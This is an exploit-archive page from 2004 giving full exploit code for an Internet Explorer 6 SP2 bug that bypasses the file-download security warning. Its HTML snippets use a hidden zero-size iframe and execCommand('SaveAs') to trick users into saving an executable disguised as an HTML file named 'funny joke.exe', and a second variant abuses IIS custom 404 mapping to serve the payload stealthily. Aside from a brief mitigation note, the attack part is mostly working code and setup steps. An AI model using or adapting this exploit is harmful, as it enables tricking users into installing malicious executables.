exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

20041119.IESP2Unpatched.html

20041119.IESP2Unpatched.html
Posted Nov 20, 2004
Authored by cyber flash | Site k-otik.com

Microsoft Internet Explorer (including IE for Windows XP SP2) is reported vulnerable to a file download security warning bypass. This unpatched flaw may be exploited to download a malicious executable file masqueraded as a HTML file. Full exploitation given. Original posted on k-otik.

tags | exploit
systems | windows
SHA-256 | 5cf54bfc3b98194b62e01d674a293f76a8b55e5d1942178a1fcfe020e729bc73

20041119.IESP2Unpatched.html

Change Mirror Download
<HTML><HEAD><TITLE>Internet Explorer 6.0 SP2 File Download Security 
Warning Bypass Exploit</TITLE>
<BODY id=all text=#000000 vLink=#000020 aLink=#000020 link=#000020
bgColor=#e9e9e9 topMargin=10 marginheight="10" marginwidth="10">
<center>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="74%" id="AutoNumber4">
<tr>
<td width="100%">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber5">
<tr>
<td width="100%">
<p align="center"><b><font size="1" face="Verdana">Internet
Explorer 6.0 SP2 File Download Security Warning Bypass Exploit</font></b></td>
</tr>
</table><div align="center">
</div>
<font size="1"></font>
<div align="justify">
<pre><font face="Verdana" size="1">Microsoft Internet Explorer (including IE for Windows XP SP2) is reported vulnerable to a file download security warning
bypass. This unpatched flaw may be exploited to download a malicious executable file masqueraded as a HTML file.

</font><font color="#FF0000" face="Verdana" size="1">Secunia did not release the technical details (aka Security by Obscurity) </font><font size="1" face="Verdana" color="#FF0000">thus</font><font color="#FF0000" face="Verdana" size="1"> we publish this page (aka Full Disclosure)</font></pre>
</div>
<pre><font face="Verdana" size="1"><b><u>Solution</u></b>

[EN] Disable Active Scripting and the "Hide file extensions for known file types" option [Tools->Folder Options->View]
[FR] Désactivez Active Scriptig et l'option "Masquer les extensions des fichiers dont le type est connu [Panneau de
configuration -> Options des dossiers -> Affichage]


<u>Credits</u> : go to cyber flash


<u>How does it work ? A.K.A Exploit

</u>The following code requires no special server setup, and should work from any webpage that IE 6.0 fetches:</font></pre>
<table style="BORDER-COLLAPSE: collapse" cellSpacing="0" cellPadding="0" width="75%" bgColor="#e6e6e6" border="1" height="96">
<tr>
<td noWrap bordercolor="#000000" height="94">
<font face="Verdana"><font color="#000080" size="1"><html><br>
<body><br>
<iframe src</font><font color="#345487" size="1">='http://domain.com/v.exe?.htm'

</font><font color="#000080" size="1">name="NotFound" width="0" height="0"></iframe>Click<br>
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');"><br>
here</a>.<br>
</body><br>
</html></font></font></td>
</tr>
</table>
<p><font size="1" face="Verdana">Also, here's an example that
requires modifying the IIS Error Mapping Properties (see below):</font></p>
<table style="BORDER-COLLAPSE: collapse" cellSpacing="0" cellPadding="0" width="75%" bgColor="#e6e6e6" border="1" height="96">
<tr>
<td noWrap bordercolor="#000000" height="94">
<font color="#000080" size="1" face="Verdana"><html><br>
<body><br>
<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>Click<br>
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');"><br>
here</a>.<br>
</body><br>
</html></font></td>
</tr>
</table>
<p><font size="1" face="Verdana">Steps to configure IIS:</font></p>
<p><font size="1" face="Verdana">Launch Internet Information
Services manager.<br>
Under the 'Custom Errors' tab, modify the Error Mapping Properties
as follows:</font></p>
<ol type="i">
<li><font size="1" face="Verdana">Error Code: 404 </font></li>
<li><font size="1" face="Verdana">Default Text: Not Found </font>
</li>
<li><font size="1" face="Verdana">Message Type: URL </font></li>
<li><font size="1" face="Verdana">URL: /v.exe (name of the
executable)</font></li>
</ol>
<p><font size="1" face="Verdana">Within the HTML page, insert an
IFRAME as follows:</font></p>
<p><font color="#000080" size="1" face="Verdana"><iframe src='vengy404.htm'
name="NotFound" width="0" height="0"></iframe></font></p>
<p><font size="1" face="Verdana">The file 'vengy404.htm'
intentionally doesn't exist on the server, so it will trigger a 404
error message as defined above. But, the javascript code below
references the stealthy v.exe data within the frame 'NotFound' and
is linked to 'funny joke.exe' when prompted to save the file:</font></p>
<p><font color="#000080" size="1" face="Verdana">javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');</font><font face="Verdana" size="1"><br>
<br>
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close